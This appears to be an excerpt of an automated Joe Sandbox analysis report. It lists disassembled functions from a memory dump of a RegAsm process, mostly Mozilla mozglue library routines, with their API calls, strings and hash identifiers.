                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                    • API String ID: 16519850-1833026159
                                                                                    • Opcode ID: b5d49f73169d63e7c0d1aca91fec09a03aefdbd9cecdb17dca3d94807cec50b5
                                                                                    • Instruction ID: c43df532af7136a66ee5ef4905af1c54f91fe28f5ceb72cf2604fdc02e5322e8
                                                                                    • Opcode Fuzzy Hash: b5d49f73169d63e7c0d1aca91fec09a03aefdbd9cecdb17dca3d94807cec50b5
                                                                                    • Instruction Fuzzy Hash: 3351F7B57046189FDB007BA9D508BAA77F8EB4632CF10C577E97583B40DB706804C7A6
                                                                                    Function 6C6FD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74E804), ref: 6C6FD047
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6FD093
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6FD0A6
                                                                                    • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C74E810,00000040), ref: 6C6FD0D0
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E7B8,00001388), ref: 6C6FD147
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E744,00001388), ref: 6C6FD162
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E784,00001388), ref: 6C6FD18D
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E7DC,00001388), ref: 6C6FD1B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                    • API String ID: 2957312145-326518326
                                                                                    • Opcode ID: 0625f9044e6da322e30aa8f12df78ed16011464931876b10b44bcc2dcfa67259
                                                                                    • Instruction ID: fcad2d77b4b89a5ec0083c91b12f5e0059e08117e87e19ddd95aeb0245240a49
                                                                                    • Opcode Fuzzy Hash: 0625f9044e6da322e30aa8f12df78ed16011464931876b10b44bcc2dcfa67259
                                                                                    • Instruction Fuzzy Hash: 7481E770B042089BEB01EF79C944B69B7FAEB5633CF10813AE52197B40D775A806CBD5
                                                                                    Function 6C6D7FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C6D8007
                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C6D801D
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C6D802B
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C6D803D
                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C6D808D
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C6D809B
                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C6D80B9
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6D80DF
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D80ED
                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D80FB
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D810D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6D8133
                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C6D8149
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C6D8167
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C6D817C
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D8199
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                    • String ID: 0>pl
                                                                                    • API String ID: 2721933968-2493627298
                                                                                    • Opcode ID: 50b8068e5e32fbd18e2650e530d0c2999bc43c939cc76d122f7c9aa45daef13e
                                                                                    • Instruction ID: 505a8f46272a35fc3ff1898586c2506705b1dfc4a94c458d932fa20a31bfe256
                                                                                    • Opcode Fuzzy Hash: 50b8068e5e32fbd18e2650e530d0c2999bc43c939cc76d122f7c9aa45daef13e
                                                                                    • Instruction Fuzzy Hash: 7A51A6B2E001149BDB00DBA9DC889EFB7B9EF4D324F154125E815E7751E730AD09CBA5
                                                                                    Function 6C6D5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5E9D
                                                                                      • Part of subcall function 6C6E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B85
                                                                                      • Part of subcall function 6C6E5B50: EnterCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B90
                                                                                      • Part of subcall function 6C6E5B50: LeaveCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5BD8
                                                                                      • Part of subcall function 6C6E5B50: GetTickCount64.KERNEL32 ref: 6C6E5BE4
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D5EAB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D5EB8
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5ECF
                                                                                    • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C6D6017
                                                                                      • Part of subcall function 6C6C4310: moz_xmalloc.MOZGLUE(00000010,?,6C6C42D2), ref: 6C6C436A
                                                                                      • Part of subcall function 6C6C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6C42D2), ref: 6C6C4387
                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6C6D5F47
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D5F53
                                                                                    • GetCurrentThread.KERNEL32 ref: 6C6D5F5C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D5F66
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6D5F7E
                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6C6D5F27
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D5E8C
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D605D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D60CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                    • String ID: GeckoMain
                                                                                    • API String ID: 3711609982-966795396
                                                                                    • Opcode ID: 04fd2f642d05b44047301a45531ea95bc9e674b9797d86316e07460560d8fac1
                                                                                    • Instruction ID: e788c63ae4a8d14ed672d3c7b1b4593ec1e23c84516eaddefd23436fe4529a70
                                                                                    • Opcode Fuzzy Hash: 04fd2f642d05b44047301a45531ea95bc9e674b9797d86316e07460560d8fac1
                                                                                    • Instruction Fuzzy Hash: BA71E5B06057409FD710DF29C580A6ABBF0FF9A308F14496EE4968BB52D731F948CB96
                                                                                    Function 6C6D9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6C3217
                                                                                      • Part of subcall function 6C6C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6C3236
                                                                                      • Part of subcall function 6C6C31C0: FreeLibrary.KERNEL32 ref: 6C6C324B
                                                                                      • Part of subcall function 6C6C31C0: __Init_thread_footer.LIBCMT ref: 6C6C3260
                                                                                      • Part of subcall function 6C6C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6C327F
                                                                                      • Part of subcall function 6C6C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6C328E
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32AB
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32D1
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C32E5
                                                                                      • Part of subcall function 6C6C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C32F7
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6D9675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D9697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6D96E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6D9707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9773
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6D97B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 3361784254-3880535382
                                                                                    • Opcode ID: b525a9c2c097dd51bb3dfdfebbadf1e8d4e396d64627dcef197b2cf654e4f258
                                                                                    • Instruction ID: ad55362078f6335467255a896d4463890f8def57352523a6bd325e996c1d8f13
                                                                                    • Opcode Fuzzy Hash: b525a9c2c097dd51bb3dfdfebbadf1e8d4e396d64627dcef197b2cf654e4f258
                                                                                    • Instruction Fuzzy Hash: 6E61F071600205EFDF01EF79D994B9A7BB5EB8A31CF41C53AE92583B80DB34A844CB95
                                                                                    Function 6C6D11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C6D1213
                                                                                    • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6D1285
                                                                                    • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C6D12B9
                                                                                    • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C6D1327
                                                                                    Strings
                                                                                    • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C6D12AD
                                                                                    • &, xrefs: 6C6D126B
                                                                                    • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C6D131B
                                                                                    • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C6D120D
                                                                                    • MZx, xrefs: 6C6D11E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$toupper
                                                                                    • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                    • API String ID: 403083179-3658087426
                                                                                    • Opcode ID: 6c016c4a5ee13db3f915e2a4c6959bd74df8398f94cbc9f4c656e9ec2e591c99
                                                                                    • Instruction ID: b95f0f91d036ae1d487d2c435069410836ad6f87cefeaba4868f3fac3d9d0144
                                                                                    • Opcode Fuzzy Hash: 6c016c4a5ee13db3f915e2a4c6959bd74df8398f94cbc9f4c656e9ec2e591c99
                                                                                    • Instruction Fuzzy Hash: E271E571E057688ADB209FB4C8007DEB7F1BF4531DF06066AD545A3B40D7B4BA88CB9A
                                                                                    Function 6C6C31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6C3217
                                                                                    • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6C3236
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6C324B
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6C3260
                                                                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6C327F
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6C328E
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32AB
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6C32D1
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C32E5
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C32F7
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • __aulldiv.LIBCMT ref: 6C6C346B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                    • String ID: KernelBase.dll$QueryInterruptTime
                                                                                    • API String ID: 3006643210-2417823192
                                                                                    • Opcode ID: 5068efd82baf3c52f87cb72694caf34ddbb7265c898aa9775ba6a524fcc66700
                                                                                    • Instruction ID: e71e7116c8c0d03ec2fcf35ef7524cd4f2e3b07c9d009a2340ca80129f7bdaca
                                                                                    • Opcode Fuzzy Hash: 5068efd82baf3c52f87cb72694caf34ddbb7265c898aa9775ba6a524fcc66700
                                                                                    • Instruction Fuzzy Hash: 44611571A087418BC711DF38C45169AB3F5FFC6358F218B2EF8A5A3690DB349549CB4A
                                                                                    Function 6C726660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(6C74F618), ref: 6C726694
                                                                                    • GetThreadId.KERNEL32(?), ref: 6C7266B1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7266B9
                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7266E1
                                                                                    • EnterCriticalSection.KERNEL32(6C74F618), ref: 6C726734
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C72673A
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F618), ref: 6C72676C
                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7267FC
                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C726868
                                                                                    • RtlCaptureContext.NTDLL ref: 6C72687F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                    • String ID: WalkStack64
                                                                                    • API String ID: 2357170935-3499369396
                                                                                    • Opcode ID: bccb90e12aadbab6f0f7492c73387a922ef1ac0dc990ec23a9ea8c43f0f4407c
                                                                                    • Instruction ID: 16972640d5f7559be3bb6beff9d17ddc3deabb635238fa7394ad6d5a3d629b47
                                                                                    • Opcode Fuzzy Hash: bccb90e12aadbab6f0f7492c73387a922ef1ac0dc990ec23a9ea8c43f0f4407c
                                                                                    • Instruction Fuzzy Hash: F951BC71A09750AFD711DF25CA44A5EBBF4FF89718F00892EF59887640D774AA088B92
                                                                                    Function 6C70DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70DE73
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70DF7D
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70DF8A
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70DFC9
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70DFF7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70E000
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C6D4A68), ref: 6C70DE7B
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C6D4A68), ref: 6C70DEB8
                                                                                    • free.MOZGLUE(00000000,?,6C6D4A68), ref: 6C70DEFE
                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C70DF38
                                                                                    Strings
                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6C70DE83
                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C70E00E
                                                                                    • <none>, xrefs: 6C70DFD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                    • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                    • API String ID: 1281939033-809102171
                                                                                    • Opcode ID: 385e83b13a173e6f72251648ba785834e1820427cab343ff9893d7ad8f9e8096
                                                                                    • Instruction ID: 9ec4270be59c37a0b758861dd5a2e9c6594712f47fb42a868a4e0b4d83b738f5
                                                                                    • Opcode Fuzzy Hash: 385e83b13a173e6f72251648ba785834e1820427cab343ff9893d7ad8f9e8096
                                                                                    • Instruction Fuzzy Hash: BD4109B17016109BDB10AF69D908BAE77B5EF9631CF048037E93587B01CB70A805CBE9
                                                                                    Function 6C71D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D85F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D86C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D918
